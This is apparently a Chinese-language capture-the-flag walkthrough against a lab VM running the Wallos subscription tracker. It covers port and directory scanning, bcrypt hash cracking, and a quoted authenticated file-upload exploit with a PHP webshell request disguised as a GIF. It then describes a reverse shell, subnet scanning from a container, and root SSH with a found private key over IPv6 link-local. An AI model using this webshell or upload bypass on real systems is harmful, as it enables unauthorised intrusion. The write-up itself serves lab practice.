1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
┌──(root㉿kali)-[~]
└─# nmap -e eth1 -Pn -A -sV -T4 -p- 192.168.56.103
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-17 03:35 EST
Nmap scan report for 192.168.56.103
Host is up (0.00023s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE    SERVICE VERSION
22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.57 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-title: Wallos - Subscription Tracker
|_Requested resource was login.php
|_http-server-header: Apache/2.4.57 (Ubuntu)
MAC Address: 08:00:27:7F:90:98 (Oracle VirtualBox virtual NIC)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=12/17%OT=80%CT=1%CU=33274%PV=Y%DS=1%DC=D%G=Y%M=0800
OS:27%TM=676137D5%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10D%TI=Z%CI=Z%
OS:II=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11N
OS:W7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE8
OS:8%W6=FE88)ECN(R=Y%DF=Y%T=3F%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=3F
OS:%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=40%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=3F%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T
OS:=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=
OS:0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(
OS:R=Y%DFI=N%T=40%CD=S)

Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.23 ms 192.168.56.103

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.04 seconds
                                                                                                                                                                                    
┌──(root㉿kali)-[~]
└─# dirsearch -u 192.168.56.103      
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/_192.168.56.103/_24-12-17_03-36-06.txt

Target: http://192.168.56.103/

[03:36:06] Starting: 
[03:36:07] 200 -   72B  - /.dockerignore
[03:36:07] 200 -  454B  - /.github/
[03:36:07] 200 -  118B  - /.gitignore
[03:36:07] 403 -  279B  - /.ht_wsr.txt
[03:36:07] 403 -  279B  - /.htaccess.bak1
[03:36:07] 403 -  279B  - /.htaccess.orig
[03:36:07] 403 -  279B  - /.htaccess.sample
[03:36:07] 403 -  279B  - /.htaccess_extra
[03:36:07] 403 -  279B  - /.htaccess_sc
[03:36:07] 403 -  279B  - /.htaccessBAK
[03:36:07] 403 -  279B  - /.htaccess.save
[03:36:07] 403 -  279B  - /.htaccessOLD
[03:36:07] 403 -  279B  - /.htaccessOLD2
[03:36:07] 403 -  279B  - /.htm
[03:36:07] 403 -  279B  - /.htaccess_orig
[03:36:07] 403 -  279B  - /.html
[03:36:07] 403 -  279B  - /.htpasswd_test
[03:36:07] 403 -  279B  - /.htpasswds
[03:36:07] 403 -  279B  - /.httr-oauth
[03:36:08] 403 -  279B  - /.php
[03:36:15] 200 -    0B  - /auth.php
[03:36:17] 200 -    7KB - /CHANGELOG.md
[03:36:19] 301 -  313B  - /db  ->  http://192.168.56.103/db/
[03:36:19] 200 -  458B  - /db/
[03:36:19] 200 -    2KB - /Dockerfile
[03:36:22] 301 -  317B  - /images  ->  http://192.168.56.103/images/
[03:36:22] 200 -  614B  - /images/
[03:36:22] 301 -  319B  - /includes  ->  http://192.168.56.103/includes/
[03:36:22] 200 -  699B  - /includes/
[03:36:24] 301 -  315B  - /libs  ->  http://192.168.56.103/libs/
[03:36:24] 200 -  667B  - /login.php
[03:36:25] 302 -    0B  - /logout.php  ->  .
[03:36:25] 200 -    3KB - /manifest.json
[03:36:27] 200 -    1KB - /nginx.conf
[03:36:31] 301 -  322B  - /screenshots  ->  http://192.168.56.103/screenshots/
[03:36:31] 301 -  318B  - /scripts  ->  http://192.168.56.103/scripts/
[03:36:31] 200 -  578B  - /scripts/
[03:36:32] 403 -  279B  - /server-status
[03:36:32] 403 -  279B  - /server-status/
[03:36:34] 200 -    1KB - /startup.sh
[03:36:34] 301 -  317B  - /styles  ->  http://192.168.56.103/styles/

Task Completed

信息泄露

image-20241217164333166

image-20241217164339699

hashcat直接爆

1
hashcat -m 3200 -a 0 hash.txt rockyou.txt

image-20241217164401141

直接登录

image-20241217164424271

第一件事就是找框架漏洞

image-20241217164505388

image-20241217164543660

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
# Exploit Title: Wallos - File Upload RCE (Authenticated)
# Date: 2024-03-04
# Exploit Author: sml@lacashita.com
# Vendor Homepage: https://github.com/ellite/Wallos
# Software Link: https://github.com/ellite/Wallos
# Version: < 1.11.2
# Tested on: Debian 12

Wallos allows you to upload an image/logo when you create a new subscription.
This can be bypassed to upload a malicious .php file.

POC
---

1) Log into the application.
2) Go to "New Subscription"
3) Upload Logo and choose your webshell .php
4) Make the Request changing Content-Type to image/jpeg and adding "GIF89a", it should be like:

--- SNIP -----------------

POST /endpoints/subscription/add.php HTTP/1.1

Host: 192.168.1.44

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://192.168.1.44/

Content-Type: multipart/form-data; boundary=---------------------------29251442139477260933920738324

Origin: http://192.168.1.44

Content-Length: 7220

Connection: close

Cookie: theme=light; language=en; PHPSESSID=6a3e5adc1b74b0f1870bbfceb16cda4b; theme=light

-----------------------------29251442139477260933920738324

Content-Disposition: form-data; name="name"

test

-----------------------------29251442139477260933920738324

Content-Disposition: form-data; name="logo"; filename="revshell.php"

Content-Type: image/jpeg

GIF89a;

<?php
system($_GET['cmd']);
?>

-----------------------------29251442139477260933920738324

Content-Disposition: form-data; name="logo-url"

----- SNIP -----

5) You will get the response that your file was uploaded ok:

{"status":"Success","message":"Subscription updated successfully"}


6) Your file will be located in:
http://VICTIM_IP/images/uploads/logos/XXXXXX-yourshell.php

upload logo处直接传🐎

image-20241217164821040

image-20241217164938649

蚁剑直接连

image-20241217165114864

发现可以,上传反弹shell的🐎

image-20241217171721596

成功接到shell

image-20241217171757225

6.。。

image-20241217171829478

得到user.txt

塞个leapeas进去

原来我们在容器里。。

image-20241217181540194

塞个fscan进去扫C段

image-20241217182604572

发现另一个ip,能ping通的

发现一个私钥一个公钥

image-20241217183147693

拉到本地来可以解出公钥

1
2
┌──(root㉿kali)-[~/yiyi/tmp]
└─# ssh-keygen -y -f ssh

image-20241217183301517

但是在这里不能简单的拿私钥去登录,因为他的22端口的ipv4是被封锁的

image-20241217183505848

去查看靶机的ipv6

image-20241217183813401

使用 ping6 与链路本地地址广播

通过向链路本地地址的 “所有节点多播组” 发送 ICMPv6 请求,可以发现同一链路上的所有 IPv6 设备。

1
ping6 -I eth1 ff02::1

image-20241217185953551

试一下就出来了

1
ssh root@fe80::a00:27ff:fe7f:9098%eth1 -i ssh

image-20241217190617017